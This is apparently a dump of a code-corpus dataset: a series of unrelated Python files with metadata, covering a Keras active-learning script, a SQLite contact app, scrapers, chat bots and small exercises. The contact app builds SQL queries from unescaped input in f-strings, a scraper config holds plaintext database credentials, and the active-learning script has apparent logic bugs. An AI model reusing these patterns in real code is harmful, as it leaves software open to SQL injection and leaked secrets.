np.zeros(shape=(nb_epoch, 1)) \t#row - no.of epochs, col (gets appended) - no of pooling\nPool_Train_Loss = np.zeros(shape=(nb_epoch, 1)) \nx_pool_All = np.zeros(shape=(1))\n\nY_train = np_utils.to_categorical(y_train, nb_classes)\n\nprint('Training Model Without Acquisitions')\n\nmodel = Sequential()\nmodel.add(Convolution2D(nb_filters, nb_conv, nb_conv, border_mode='valid', input_shape=(1, img_rows, img_cols)))\nmodel.add(Activation('relu'))\nmodel.add(Convolution2D(nb_filters, nb_conv, nb_conv))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(nb_pool, nb_pool)))\nmodel.add(Dropout(0.25))\n\nmodel.add(Flatten())\nmodel.add(Dense(128))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(nb_classes))\nmodel.add(Activation('softmax'))\n\nmodel.compile(loss='categorical_crossentropy', optimizer='adam')\n\nhist = model.fit(X_train, Y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=True, verbose=1, validation_data=(X_valid, Y_valid))\nTrain_Result_Optimizer = hist.history\nTrain_Loss = np.asarray(Train_Result_Optimizer.get('loss'))\nTrain_Loss = np.array([Train_Loss]).T\nValid_Loss = np.asarray(Train_Result_Optimizer.get('val_loss'))\nValid_Loss = np.asarray([Valid_Loss]).T\n\nPool_Train_Loss = Train_Loss\nPool_Valid_Loss = Valid_Loss\n\nprint('Evaluating Test Accuracy Without Acquisition')\nscore, acc = model.evaluate(X_test, Y_test, show_accuracy=True, verbose=0)\n\nall_accuracy = acc\n\n\n\n\nacquisition_iterations = 2\n\n#number of points to query every iteration\nQuery = 50\n\nprint('Performing Active Learning')\nfor i in range(acquisition_iterations):\n\n\tprint('POOLING ITERATION ', i)\n\n\tAll_Data = np.concatenate( (X_train, X_Pool), axis=0 )\n\n\t#TODO: need to downsample the image data:\t - CHECK THIS\n\tImage_Data = All_Data.reshape(All_Data.shape[0], img_rows*img_cols)\n\n\t#compute the kernel matrix\n\tsigma = 1\n\tpairwise_dists = squareform(pdist(Image_Data, 'euclidean'))\n\tW = sp.exp(pairwise_dists ** 2 / sigma ** 2)\n\n\n\t#compute the combinatorial Laplacian\n\td_i = W.sum(axis=1)\n\tD = np.diag(d_i)\n\n\tDelta = D - W \n\n\t#computing the harmonic function - without any acquisitions yet\n\tDelta_ll = Delta[0:X_train.shape[0], 0:X_train.shape[0]]\n\tDelta_ul = Delta[X_train.shape[0]:, 0:X_train.shape[0]]\n\tDelta_lu = Delta[0:X_train.shape[0], X_train.shape[0]:]\n\tDelta_uu = Delta[X_train.shape[0]:, X_train.shape[0]:]\n\n\n\tinv_Delta_uu = linalg.inv(Delta_uu)\n\tOriginal_f_L = y_train\n\tDelta_mult = np.dot(inv_Delta_uu, Delta_ul)\n\tOriginal_f_U = - np.dot(Delta_mult, Original_f_L)\t\t\t\n\n\t#f_I is the entire harmonic function over all the data points (U + L)\n\tOriginal_f_I = np.concatenate((Original_f_L, Original_f_U), axis=0)\n\n\t#compute the estimated Bayes risk - no acquisitions yet\n\t# R = np.array([0])\n\t# for m in range(Original_f_I.shape[0]):\n\t# \tval_f_I = Original_f_I[m]\n\t# \tother_val_f_I = 1 - val_f_I\n\t# \tmin_val = np.amin(np.array([val_f_I, other_val_f_I]))\n\t# \tR = R + min_val\n\n\n\tprint('Compute Expected Bayes Risk for ALL Pool Points in Acquisition Iteration ', i)\n\n\t# need to store the expected estimated risk value for each unlabelled pool point\n\tBayes_Risk = np.zeros(shape=(X_Pool.shape[0]))\n\tPool_Subset = 100\n\n\tfor k in range(Pool_Subset):\n\n\t\tprint('Pool Subset Iteration', k)\n\n\t\t#compute estimated risk for each added point\n\t\tPool_Point = X_Pool[np.array([k]), :, :, :]\n\t\tPool_Point_y = y_Pool[np.array([k])]\n\n\t\t#add this pool point to labelled data - but we don't know the actual label for it\n\t\tX_train_Temp = np.concatenate((X_train, Pool_Point), axis=0)\n\t\ty_train_Temp = np.concatenate((y_train, Pool_Point_y), axis=0)\n\n\t\t#delete this pool point from pool set\n\t\tX_Pool_Temp = np.delete(X_Pool, k, 0)\n\n\n\t\t# # W and D stays the same - only Delta_uu, Delta_ul etc changes\n\t\tDelta_ll = Delta[0:X_train_Temp.shape[0], 0:X_train_Temp.shape[0]]\n\t\tDelta_ul = Delta[X_train_Temp.shape[0]:, 0:X_train_Temp.shape[0]]\n\t\tDelta_lu = Delta[0:X_train_Temp.shape[0], X_train_Temp.shape[0]:]\n\t\tDelta_uu = Delta[X_train_Temp.shape[0]:, X_train_Temp.shape[0]:]\n\n\n\t\t#compute the new changed f\n\t\tinv_Delta_uu = linalg.inv(Delta_uu)\n\t\tf_L = y_train_Temp\n\t\tDelta_mult = np.dot(inv_Delta_uu, Delta_ul)\n\t\tf_U = - np.dot(Delta_mult, f_L)\t\t\t\n\t\tf_I = np.concatenate((f_L, f_U), axis=0)\n\n\t\t#compute the new estimated Bayes risk for this added point\n\t\tR = np.array([0])\n\t\tfor m in range(f_I.shape[0]):\n\t\t\tval_f_I = f_I[m]\n\t\t\tother_val_f_I = 1 - val_f_I\n\t\t\tmin_val = np.amin(np.array([val_f_I, other_val_f_I]))\n\t\t\tR = R + min_val\n\t\tEstimated_Risk = R\n\n\n\t\t#we need f_k values for each pool point in consideration\n\t\tf_All_Pool = Original_f_I[Original_f_L.shape[0]:]\n\t\tf_k = f_All_Pool[k]\n\n\t\t# f_All_Pool = f_I[f_L.shape[0]:]\n\t\t# f_k = f_All_Pool[k]\n\n\t\tBayes_Risk[k] = (1 - f_k) * Estimated_Risk + (f_k)*Estimated_Risk\n\n\tprint('Finished Computing Bayes Risk for Unlabelled Pool Points')\n\n\t#find the best query from the Bayes_Risk - do the acquisition\t\n\t# THIS FINDS THE INDEX OF THE MINIMUM\n\tb_1d = Bayes_Risk.flatten()\n\tx_pool_index = b_1d.argsort()[-Query:]\n\n\n\n\t#find the query point x_pool_index from Pool Set and its original label\n\tPooled_X = X_Pool[x_pool_index, :, :, :]\n\tPooled_Y = y_Pool[x_pool_index]\t\t# true label from the oracle\n\n\t#add queried point to train set and remove from pool set\n\tprint('Acquised Points added to training set')\n\tX_train = np.concatenate((X_train, Pooled_X), axis=0)\n\ty_train = np.concatenate((y_train, Pooled_Y), axis=0)\n\n\t#delete the currently pooled points from the pool set\n\tX_Pool = np.delete(X_Pool, x_pool_index, 0)\n\n\n\tprint('Training Model with pooled points')\n\n\t# convert class vectors to binary class matrices\n\tY_train = np_utils.to_categorical(y_train, nb_classes)\n\n\tmodel = Sequential()\n\tmodel.add(Convolution2D(nb_filters, nb_conv, nb_conv, border_mode='valid', input_shape=(1, img_rows, img_cols)))\n\tmodel.add(Activation('relu'))\n\tmodel.add(Convolution2D(nb_filters, nb_conv, nb_conv))\n\tmodel.add(Activation('relu'))\n\tmodel.add(MaxPooling2D(pool_size=(nb_pool, nb_pool)))\n\tmodel.add(Dropout(0.25))\n\n\tmodel.add(Flatten())\n\tmodel.add(Dense(128))\n\tmodel.add(Activation('relu'))\n\tmodel.add(Dropout(0.5))\n\tmodel.add(Dense(nb_classes))\n\tmodel.add(Activation('softmax'))\n\n\tmodel.compile(loss='categorical_crossentropy', optimizer='adam')\n\thist = model.fit(X_train, Y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=True, verbose=1, validation_data=(X_valid, Y_valid))\n\tTrain_Result_Optimizer = hist.history\n\tTrain_Loss = np.asarray(Train_Result_Optimizer.get('loss'))\n\tTrain_Loss = np.array([Train_Loss]).T\n\tValid_Loss = np.asarray(Train_Result_Optimizer.get('val_loss'))\n\tValid_Loss = np.asarray([Valid_Loss]).T\n\n\t#Accumulate the training and validation/test loss after every pooling iteration - for plotting\n\tPool_Valid_Loss = np.append(Pool_Valid_Loss, Valid_Loss, axis=1)\n\tPool_Train_Loss = np.append(Pool_Train_Loss, Train_Loss, axis=1)\t\n\n\n\tprint('Evaluate Model Test Accuracy with pooled points')\n\n\tscore, acc = model.evaluate(X_test, Y_test, show_accuracy=True, verbose=0)\n\tprint('Test score:', score)\n\tprint('Test accuracy:', acc)\n\tall_accuracy = np.append(all_accuracy, acc)\n\n\nnp.save('Accuracy_MBR.npy', all_accuracy)\nnp.save('Train_Loss_MBR.npy', Pool_Train_Loss)\nnp.save('Valid_Loss_MBR.npy', Pool_Valid_Loss)\n\nprint('FINISHED')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"ConvNets/active_learning/Acquisition_Functions/SSL_Minimum_Bayes_Risk/trial_minimum_bayes_risk.py","file_name":"trial_minimum_bayes_risk.py","file_ext":"py","file_size_in_byte":10338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"437908464","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# import time\nimport gevent\nfrom gevent import monkey, time\nmonkey.patch_all()\n\n\ndef func1():\n print(123)\n time.sleep(3)\n print(456)\n\n\ndef func2():\n print('---------')\n time.sleep(1)\n print('=========')\n\n\ng1 = gevent.spawn(func1)\ng2 = gevent.spawn(func2)\ngevent.joinall([g1, g2])\nprint('main')\n","sub_path":"036 协程/3.gevent模块.py","file_name":"3.gevent模块.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"457096044","text":"from PythonApplication2.AOne_Mobile_Services.Contact import Contact\nimport sqlite3\n\n\ndef execute_query(query):\n con = None\n data = None\n try:\n con = sqlite3.connect('contact_app.db')\n cur = con.cursor()\n cur.execute(query)\n data = cur.fetchall()\n if not data:\n con.commit()\n except sqlite3.Error as e:\n print(\"Database error: %s\" % e)\n except Exception as e:\n print(\"Exception in _query: %s\" % e)\n finally:\n if con:\n con.close()\n return data\n\n\nclass ContactDBApp:\n\n def __init__(self):\n pass\n\n def add_contact(self, contact):\n if self.check_if_contact_exist(contact):\n return False\n else:\n query = f\"INSERT INTO contact_app VALUES ('{contact.get_name()}',\" \\\n f\" '{contact.get_type_of_contact()}', '{contact.get_phone_call()}')\"\n execute_query(query)\n return True\n\n def update_contact(self, contact):\n if self.check_if_contact_exist(contact):\n query = f\"update contact_app set name= '{contact.get_name()}', \" \\\n f\"type_of_contact='{contact.get_type_of_contact()}'\" \\\n f\", phone_call= '{contact.get_phone_call()}' where name='{contact.get_name()}'\"\n execute_query(query)\n return True\n else:\n return False\n\n def delete_contact(self, contact):\n if self.check_if_contact_exist(contact):\n query = f\"delete from contact_app where name= '{contact.get_name()}'\"\n execute_query(query)\n return True\n else:\n return False\n\n def find_contact_by_name(self, contact):\n query = f\"select * from contact_app where name= '{contact.get_name()}'\"\n\n return execute_query(query)\n\n def find_all_contact(self):\n query = \"select * from contact_app\"\n return execute_query(query)\n\n def check_if_contact_exist(self, contact):\n if self.find_contact_by_name(contact):\n return True\n else:\n return False\n\n\n\n# Create table\n\"\"\"\nc.execute('''CREATE TABLE contact_app\n (name text, type_of_contact text, phone_call text)''')\n\"\"\"\n","sub_path":"projects/PythonScripts/Proyect/AOne_Mobile_Services/DBConection.py","file_name":"DBConection.py","file_ext":"py","file_size_in_byte":2225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"62454827","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''Author: Ting\nweb_crawler'''\n\nfrom selenium import webdriver\nfrom datetime import datetime\n\ndef parse_fcn(self, response): \n # self.driver = webdriver.Firefox()\n # self.driver.get(response.url)\n\n for quote in response.css(\"div.quote\"):\n yield {\n 'text': quote.css(\"span.text::text\").extract_first(),\n 'author': quote.css(\"small.author::text\").extract_first(),\n 'tags': quote.css(\"div.tags > a.tag::text\").extract()\n }\n\n # while True:\n # next = self.driver.find_element_by_xpath('//td[@class=\"pagn-next\"]/a')\n\n # try:\n # next.click()\n\n # # get the data and write it to scrapy items\n # yield get_bs_data() if self.bs else get_scrapy_data()\n # except:\n # break\n\n # self.driver.close()\n\ndef log_data(self, item):\n # Make sure the values are in order\n args_list = [item['text']]\n args_list.append(item['author'])\n args_list.append(item['tags'])\n args_list.append(datetime.now())\n # args_str = ','.join(cur.mogrify(\"(%s,%s,%s,%s)\", x) for x in args_dict)\n args_str = self.cur.mogrify(\"(%s,%s,%s,%s)\", args_list)\n self.cur.execute(\"INSERT INTO test_db (text, author, tags, log_ts) VALUES \" + args_str) \n\nCONFIG = {'start_urls': ('http://quotes.toscrape.com/',),\n\t\t 'parse_fcn': parse_fcn, \n 'db_info': 'dbname=test_db host=localhost user=test_usr password=lololol', \n 'log_data': log_data\n\t\t }\n","sub_path":"Kagizume/Kagizume/spiders/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"544428761","text":"import json\nimport os\nimport re\n\nfrom telethon.events import CallbackQuery\n\nfrom userbot import wolfub\n\n\n@wolfub.tgbot.on(CallbackQuery(data=re.compile(b\"hide_(.*)\")))\nasync def on_plug_in_callback_query_handler(event):\n timestamp = int(event.pattern_match.group(1).decode(\"UTF-8\"))\n if os.path.exists(\"./userbot/hide.txt\"):\n jsondata = json.load(open(\"./userbot/hide.txt\"))\n try:\n reply_pop_up_alert = jsondata[f\"{timestamp}\"][\"text\"]\n except KeyError:\n reply_pop_up_alert = \"This message no longer exists in wolfub server\"\n else:\n reply_pop_up_alert = \"This message no longer exists \"\n await event.answer(reply_pop_up_alert, cache_time=0, alert=True)\n","sub_path":"userbot/assistant/hide.py","file_name":"hide.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"243023453","text":"\r\n#Diana Valeria Deanda Avalos.\r\n#Gir0141\r\n#17 de septiembre de 2019\r\n#Lista\r\n\r\ngrupo = []\r\n\r\nfor i in range (1,6):\r\n name = input (\"Ingresa tu grupo: \")\r\n grupo.append(name)\r\nprint (\"\")\r\n\r\n\r\ncontador = 1\r\nfor k in grupo:\r\n print (contador, \"Grupo:\", k)\r\n contador = contador + 1\r\n\r\nprint (\"\")\r\nfor i in reversed(grupo):\r\n print (i)\r\n\r\n\r\ndel grupo [0]\r\ndel grupo [0]\r\nprint (\"\")\r\n\r\nprint (grupo)\r\n\r\nprint (\"\")\r\n\r\n\r\n\r\n#Diccionario\r\n\r\ngrupos = {}\r\n\r\nfor i in range ( 0 , 5 ):\r\n nombre = input ( \" Favor de ingresar su nombre: \" )\r\n grupo1 = input ( \" Ingrese su grupo: \" )\r\n grupos.update ({grupo1: nombre})\r\n \r\n\r\nfor e in grupos:\r\n print (e,grupos[e].upper())\r\nprint()\r\n\r\nfor h in grupos:\r\n print (h,grupos[h].lower())\r\nprint()\r\n\r\ngrupos.clear()\r\nprint(grupos)\r\n","sub_path":"unidad_1/ejercicios/diccionario_02/dic02_DianaValeriaDeandaAvalos.py","file_name":"dic02_DianaValeriaDeandaAvalos.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"363559414","text":"import discord, asyncio, time, datetime, random, json, aiohttp, logging, os\nfrom discord.ext import commands\nfrom time import ctime\nfrom os import listdir\nfrom os.path import isfile, join\n\nlst = [f for f in listdir(\"cogs/\") if isfile(join(\"cogs/\", f))]\nno_py = [s.replace('.py', '') for s in lst]\nstartup_extensions = [\"cogs.\" + no_py for no_py in no_py]\n\nwith open(\"databases/thesacredtexts.json\") as f:\n config = json.load(f)\n\nbot = commands.AutoShardedBot(command_prefix=commands.when_mentioned_or(\"$\"),\n owner_id=276707898091110400,\n case_insensitive=True)\n\nbot.remove_command(\"help\")\nbot.launch_time = datetime.datetime.utcnow()\n\nurl = \"https://discordbots.org/api/bots/320590882187247617/stats\"\nheaders = {\"Authorization\" : config[\"tokens\"][\"dbltoken\"]}\n\ndef is_owner(ctx):\n if ctx.message.author.id == bot.owner_id:\n return True\n return False\n\nasync def fetch(session, url):\n async with session.get(url) as response:\n return await response.text()\n\nasync def update_activity():\n await bot.change_presence(\n activity=discord.Activity(\n name=f\"@Spectrum help | {len(bot.guilds)} guilds!\",\n type=1,\n url=\"https://www.twitch.tv/SpectrixYT\"))\n\n payload = {\"server_count\" : len(bot.guilds)}\n\n async with aiohttp.ClientSession() as aioclient:\n await aioclient.post(\n url,\n data=payload,\n headers=headers)\n\n@bot.event\nasync def on_ready():\n print(\"=========\\nConnected\\n=========\\n\")\n await update_activity()\n\n@bot.event\nasync def on_message(message):\n if message.author.bot:\n return\n await bot.process_commands(message)\n\n@bot.command()\nasync def uptime(ctx):\n delta_uptime = datetime.datetime.utcnow() - bot.launch_time\n hours, remainder = divmod(int(delta_uptime.total_seconds()), 3600)\n minutes, seconds = divmod(remainder, 60)\n days, hours = divmod(hours, 24)\n await ctx.send(f\"{days}d, {hours}h, {minutes}m, {seconds}s\")\n\n@bot.event\nasync def on_guild_join(guild):\n await update_activity()\n try:\n embed = discord.Embed(color=discord.Color(value=0x36393e))\n embed.set_author(name=\"Here's some stuff to get you started:\")\n embed.add_field(name=\"Prefix\", value=\"`$`, or **just mention me!**\")\n embed.add_field(name=\"Command help\", value=\"[Documentation](https://spectrix.me/spectrum/)\")\n embed.add_field(name=\"Support Server\", value=\"[Join, it's quite fun here](https://discord.gg/SuN49rm)\")\n embed.add_field(name=\"Upvote\", value=\"[Click here](https://discordbots.org/bot/320590882187247617/vote)\")\n embed.set_thumbnail(url=config[\"styling\"][\"gifLogo\"])\n embed.set_footer(text=f\"Thanks to you, Spectrum is now on {len(bot.guilds)} servers! <3\", icon_url=config[\"styling\"][\"normalLogo\"])\n await guild.system_channel.send(content=\"**Hello World! Thanks for inviting me! :wave: **\", embed=embed)\n except Exception:\n pass\n\n@bot.event\nasync def on_guild_remove(guild):\n await update_activity()\n\nif __name__ == '__main__':\n\n for extension in startup_extensions:\n bot.load_extension(extension)\n\n bot.run(config[\"tokens\"][\"token\"])","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":3254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"467639822","text":"# -*- coding: utf-8 -*-\nimport logging\n\nfrom contrib.requesthandlers import RequestHandlerBase\nfrom projects.functions import * \nfrom users.models import User\n\nclass CreateProjectRequestHandler(RequestHandlerBase):\n \"\"\"Request handler for creating projects.\"\"\"\n \n def get(self):\n users = User.all()\n context = {\n 'users': users,\n }\n self.render_to_response('projects/create.html', context)\n \n def post(self):\n project = create_project(self.request) \n if project is not None:\n self.redirect('/projects/'+str(project.key().id()))\n else:\n self.error(404)\n \nclass ShowProjectRequestHandler(RequestHandlerBase):\n \"\"\"Display project.\"\"\"\n \n def get(self, project_id):\n project = get_project(project_id)\n context = {'project': project}\n self.render_to_response('projects/show.html', context)\n \nclass EditProjectRequestHandler(RequestHandlerBase):\n \"\"\"Edit project.\"\"\"\n \n def get(self, project_id):\n project = get_project(project_id)\n users = User.all()\n context = {\n 'project': project,\n 'users': users,\n }\n self.render_to_response('projects/edit.html', context)\n \n def post(self, project_id):\n project = update_project(self.request, project_id) \n if project is not None:\n self.redirect('/projects/'+str(project.key().id()))\n else:\n self.error(404)\n \nclass ListProjectsRequestHandler(RequestHandlerBase):\n \"\"\"List projects.\"\"\"\n \n def get(self):\n projects = list_projects()\n context = {\n 'projects': projects\n }\n self.render_to_response('projects/list.html', context)\n","sub_path":"projects/requesthandlers.py","file_name":"requesthandlers.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"434343399","text":"#/usr/bin/python3\n\nimport xml.etree.ElementTree as ET\nfrom xml.etree.ElementTree import ElementTree,Element \n\nfrom xml.dom import minidom\nfrom pathlib import Path\nimport argparse\nimport re\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--pmid\", default=\"21775823\")\nargs = parser.parse_args()\npmid = args.pmid\n\nresultInBioc = \"/home/laboratory/lab/BioCreative/2017/BC6/testResult/\" + pmid + \".xml\"\nresultInPubt = \"/home/laboratory/lab/BioCreative/2017/BC6/testResult/\" + pmid + \".pubtator\"\ntre = ET.parse(resultInBioc)\nroot = tre.getroot()\n\npmid = \"\"\ntextType = \"\"\ntext = \"\"\nentites = []\ntitle = \"\"\nabstract = \"\"\nrelations = []\nfor node in root:\n if node.tag == \"id\":\n pmid = node.text\n if node.tag == \"passage\":\n for anno in node:\n if anno.tag == \"infon\":\n textType = anno.text\n if anno.tag == \"text\":\n text = anno.text\n if anno.tag == 'annotation':\n for att in anno:\n if att.tag == \"infon\" and att.attrib['key'].upper() == \"NCBI GENE\":\n entityId = att.text\n if att.tag == \"location\":\n start = att.attrib[\"offset\"]\n end = str(int(att.attrib[\"length\"]) + int(start))\n if att.tag == \"text\":\n entityMention = att.text\n entites.append(\"\\t\".join([pmid, start, end, entityMention, \"Gene\", entityId]))\n if textType == 'title':\n title = \"|\".join([pmid, 't', text])\n if textType == 'abstract':\n abstract = \"|\".join([pmid, 'a', text])\n if node.tag == 'relation':\n # \n # 851125\n # 852060\n # PPIm\n # \n for infoNode in node:\n if infoNode.attrib['key'] == \"Gene1\":\n e1Id = infoNode.text\n if infoNode.attrib['key'] == \"Gene2\":\n e2Id = infoNode.text\n relations.append(\"\\t\".join([pmid, 'PPIm', e1Id, e2Id]))\n\nwith open(resultInPubt, 'w') as f:\n f.write(title + '\\n')\n f.write(abstract + \"\\n\")\n f.writelines(\"\\n\".join(entites))\n f.write(\"\\n\")\n f.writelines(\"\\n\".join(relations))","sub_path":"postprocessing/xml2Pubtator.py","file_name":"xml2Pubtator.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"241417731","text":"import numpy as np,glob\r\n\r\nfile_unique = open('unique.dat','w')\r\nlis_cell = []\r\nucell = []\r\nlis_input = []\r\n\r\ndef extract_cell(fname):\r\n\tfile_cym = open(fname,'r')\r\n\t\r\n\tfor i,line_cym in enumerate(file_cym):\r\n\t\tif i > 0:\r\n\t\t\t#for sar\r\n\t\t\tid,lai,sos,wth,soil = line_cym.strip().split(',')\r\n\t\t\t#for modis\r\n\t\t\t#id,sos,wth,eos,pos,lai1,lai2,lai3,lai4,lai5,lai6,lai7,lai8,lai9,lai10,lai11,lai12,lai13,lai14,lai15,lai16,lai17,lai18,lai19,lai20,lai21,lai22,lai23,lai24,lai25,lai26,lai27,lai28,lai29,lai30,lai31,lai32,lai33,lai34,lai35 = line_cym.strip().split(',')\r\n\t\t\tif id != '0':\r\n\t\t\t\tlis_cell.append(wth)\r\n\r\n\tfile_cym.close()\r\n\r\ndef get_unique():\r\n\tucell = np.unique(lis_cell)\r\n\tfor i,line_cell in enumerate(ucell):\r\n\t\tfile_unique.write(line_cell+'\\n')\r\n\r\n\t#print(ucell)\r\n\tfile_unique.close()\r\n\r\ndef get_diff():\r\n\tfile_icell = open('icell.dat','r')\r\n\tfor line_icell in file_icell:\r\n\t\tlis_input.append(line_icell.strip())\r\n\tfile_icell.close()\r\n\r\n\tdiff1 = np.setdiff1d(lis_input,lis_cell)\r\n\tdiff2 = np.setdiff1d(lis_cell,lis_input)\r\n\r\ndef read_filename():\r\n\tdir = 'E:\\PRISM Weather Data\\2017Sem2_InputCYM-20170814T065626Z-001\\2017Sem2_InputCYM\\Luzon\\*.csv'\r\n\t\r\n\tfor name in glob.glob(dir):\r\n\t\textract_cell(name)\r\n\t\tprint (name)\r\n\t\r\n\tget_unique()\r\n\t#get_diff()\r\n\r\nif __name__=='__main__':\r\n\tread_filename()","sub_path":"extract_unique_wth.py","file_name":"extract_unique_wth.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"21472860","text":"\n\n#calss header\nclass _KIDNAP():\n\tdef __init__(self,): \n\t\tself.name = \"KIDNAP\"\n\t\tself.definitions = [u'to take a person away illegally by force, usually in order to demand money in exchange for releasing them: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_kidnap.py","file_name":"_kidnap.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"607669462","text":"# coding=utf-8\n\nfrom TestUI.GUI.controller.main import UiMainWindow\nfrom TestUI.GUI.controller.Passwd import EnterPwd\nfrom TestUI.GUI.controller.Loop import Loop_Frame\n# from TestUI.GUI.controller.ScriptEditor import InformGui\nfrom TestUI.GUI.controller.SettingPwd import SetPwd\nfrom PyQt5.QtCore import pyqtSignal, QObject\nfrom Common.rpc_client import RPCClientWrapper\nimport zmq\nimport Common.zmqports as zmqports\nfrom Common.publisher import ZmqPublisher\n\n\nclass GuiManager(QObject):\n \"\"\"docstring for GuiManager\"\"\"\n sigOut = pyqtSignal(dict)\n\n def __init__(self, UpdateUI, DeleteUI):\n super(GuiManager, self).__init__()\n self.UpdateUI = UpdateUI\n self.DeleteUI = DeleteUI\n self.frameDict = {} # used to upload the frame\n self.parent = None\n\n sm_proxy = RPCClientWrapper('tcp://localhost' + ':' + str(zmqports.SM_PORT),\n ZmqPublisher(zmq.Context().instance(),\n \"tcp://*:\" + str(zmqports.SM_PROXY_PUB), 'SMProxy'))\n self.sm_remote = sm_proxy.remote_server()\n\n def GetFrame(self, tp):\n frame = self.frameDict.get(tp)\n if frame is None:\n frame = self.CreateFrame(tp)\n self.frameDict[tp] = frame\n return frame\n\n def CreateFrame(self, tp):\n if tp == 0:\n self.parent = UiMainWindow(parent=None, UpdateUI=self.UpdateUI, sm_remote=self.sm_remote)\n return self.parent\n elif tp == 1:\n return Loop_Frame(parent=self.parent, UpdateUI=self.UpdateUI, DeleteUI=self.DeleteUI,\n sm_remote=self.sm_remote)\n elif tp == 2:\n return EnterPwd(parent=self.parent, UpdateUI=self.UpdateUI, DeleteUI=self.DeleteUI)\n # elif tp ==3:\n # return InformGui(parent=self.parent,UpdateUI=self.UpdateUI,DeleteUI=self.DeleteUI)\n elif tp == 4:\n return SetPwd(parent=self.parent, UpdateUI=self.UpdateUI, DeleteUI=self.DeleteUI)\n\n def DeleateFrame(self, tp):\n frame = self.frameDict.get(tp)\n if frame is None:\n return None\n else:\n self.frameDict.pop(tp)\n return True\n","sub_path":"Prm.app/Contents/MacOS/prmtester/TestUI/GUI/controller/guiManager.py","file_name":"guiManager.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"326844984","text":"# -*- coding: utf-8 -*-\n\n# Scrapy settings for yp project\n#\n# For simplicity, this file contains only settings considered important or\n# commonly used. You can find more settings consulting the documentation:\n#\n# http://doc.scrapy.org/en/latest/topics/settings.html\n# http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html\n# http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html\n\nBOT_NAME = 'yp'\n\nSPIDER_MODULES = ['yp.spiders']\nNEWSPIDER_MODULE = 'yp.spiders'\n\n# ITEM_PIPELINES = {'yp.pipelines.YpPipeline': 300 }\nFEED_EXPORTERS = {\n 'csv': 'yp.csv_item_exporter.MyProjectCsvItemExporter',\n}\nFIELDS_TO_EXPORT = ['Company_Name', 'Logo', 'Company_Type', 'Industry', 'Employees', 'Annual_Revenue', 'Currency',\n 'Comment', 'Responsible_person',\n 'Address', 'Street', 'Apartment_Suite', 'City', 'Region', 'State_Province', 'Zip', 'Country',\n 'Billing_Address', 'Street_billing', 'Apartment_Suite_billing',\n 'City_billing', 'Region Billing', 'State_Province_billing', 'Zip_billing', 'Country_billing',\n 'Work_Phone', 'Mobile', 'Fax', 'Home_phone', 'Pager_Number', 'Other_Phone_Number',\n 'Corporate_Website',\n 'Personal_Page', 'Facebook_Page', 'LiveJournal', 'Twitter', 'Other_Website', 'Work_Email',\n 'Home_Email', 'Other_Email', 'Facebook_account', 'Telegram_account',\n 'VK_account', 'Skype_ID', 'Bitrix24_Network_account', 'Open_Channel_account', 'ICQ_Number',\n 'MSN_Live', 'Jabber', 'Other_Contact', 'Payment_Details', 'Available_to_everyone', 'Seller']\nCSV_DELIMITER = \";\"\n\nROBOTSTXT_OBEY = True\n# ITEM_PIPELINES = {'scrapy.pipelines.images.ImagesPipeline': 1}\n#\n# IMAGE_STORE = 'images'\n# Crawl responsibly by identifying yourself (and your website) on the user-agent\n# USER_AGENT = 'yp (+http://www.yourdomain.com)'\n\n# Configure maximum concurrent requests performed by Scrapy (default: 16)\n# CONCURRENT_REQUESTS=16\n\n# Configure a delay for requests for the same website (default: 0)\n# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay\n# See also autothrottle settings and docs\nDOWNLOAD_DELAY=3\n# The download delay setting will honor only one of:\n# CONCURRENT_REQUESTS_PER_DOMAIN=16\n# CONCURRENT_REQUESTS_PER_IP=16\n\n# Disable cookies (enabled by default)\n# COOKIES_ENABLED=False\n\n# Disable Telnet Console (enabled by default)\n# TELNETCONSOLE_ENABLED=False\n\n# Override the default request headers:\n# DEFAULT_REQUEST_HEADERS = {\n# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n# 'Accept-Language': 'en',\n# }\n\n# Enable or disable spider middlewares\n# See 